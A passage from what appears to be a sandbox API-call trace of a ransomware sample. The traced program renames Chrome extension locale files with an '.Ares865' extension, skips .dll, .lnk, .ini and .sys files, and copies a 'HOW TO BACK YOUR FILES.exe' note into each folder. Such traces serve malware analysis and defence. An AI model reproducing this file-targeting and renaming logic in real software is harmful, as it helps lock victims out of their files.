(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.462] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16442) returned 1 [0100.467] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn" [0100.467] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.Ares865") returned 169 [0100.467] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.469] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.469] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21923) returned 1 [0100.485] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja" [0100.485] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja" [0100.485] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.485] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.487] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.487] GetLastError () returned 0x0 [0100.487] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.487] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834b86f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e16f600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e16f600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.487] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.487] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.488] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.488] lstrlenW (lpString="messages.json") returned 13 [0100.488] lstrlenW (lpString="Ares865") returned 7 [0100.488] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.488] lstrlenW (lpString=".dll") returned 4 [0100.488] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.488] lstrlenW (lpString=".lnk") returned 4 [0100.488] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.488] lstrlenW (lpString=".ini") returned 4 [0100.488] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.488] lstrlenW (lpString=".sys") returned 4 [0100.488] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.488] lstrlenW (lpString="messages.json") returned 13 [0100.488] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.Ares865") returned 169 [0100.488] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.492] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17530) returned 1 [0100.496] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw" [0100.496] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw" [0100.496] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.496] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.497] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.497] GetLastError () returned 0x0 [0100.497] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.497] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834aeab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e16f600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e16f600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.498] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.498] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.498] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.498] lstrlenW (lpString="messages.json") returned 13 [0100.498] lstrlenW (lpString="Ares865") returned 7 [0100.498] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.498] lstrlenW (lpString=".dll") returned 4 [0100.498] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.498] lstrlenW (lpString=".lnk") returned 4 [0100.498] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.498] lstrlenW (lpString=".ini") returned 4 [0100.498] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.498] lstrlenW (lpString=".sys") returned 4 [0100.498] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.498] lstrlenW (lpString="messages.json") returned 13 [0100.498] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.Ares865") returned 169 [0100.498] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.500] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20596) returned 1 [0100.505] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it" [0100.506] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it" [0100.506] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.506] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.506] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.507] GetLastError () returned 0x0 [0100.507] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.507] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834a7580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e195760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e195760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.507] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.507] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.507] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.507] lstrlenW (lpString="messages.json") returned 13 [0100.507] lstrlenW (lpString="Ares865") returned 7 [0100.507] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.507] lstrlenW (lpString=".dll") returned 4 [0100.507] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.507] lstrlenW (lpString=".lnk") returned 4 [0100.507] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.507] lstrlenW (lpString=".ini") returned 4 [0100.507] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.507] lstrlenW (lpString=".sys") returned 4 [0100.508] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.508] lstrlenW (lpString="messages.json") returned 13 [0100.508] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.Ares865") returned 169 [0100.508] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.509] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.509] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16140) returned 1 [0100.513] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id" [0100.513] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id" [0100.513] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.513] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.514] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.514] GetLastError () returned 0x0 [0100.514] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.514] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834a2760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e195760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e195760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.514] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.515] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.515] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.515] lstrlenW (lpString="messages.json") returned 13 [0100.515] lstrlenW (lpString="Ares865") returned 7 [0100.515] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.515] lstrlenW (lpString=".dll") returned 4 [0100.515] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.515] lstrlenW (lpString=".lnk") returned 4 [0100.515] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.515] lstrlenW (lpString=".ini") returned 4 [0100.515] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.515] lstrlenW (lpString=".sys") returned 4 [0100.515] lstrcmpiW 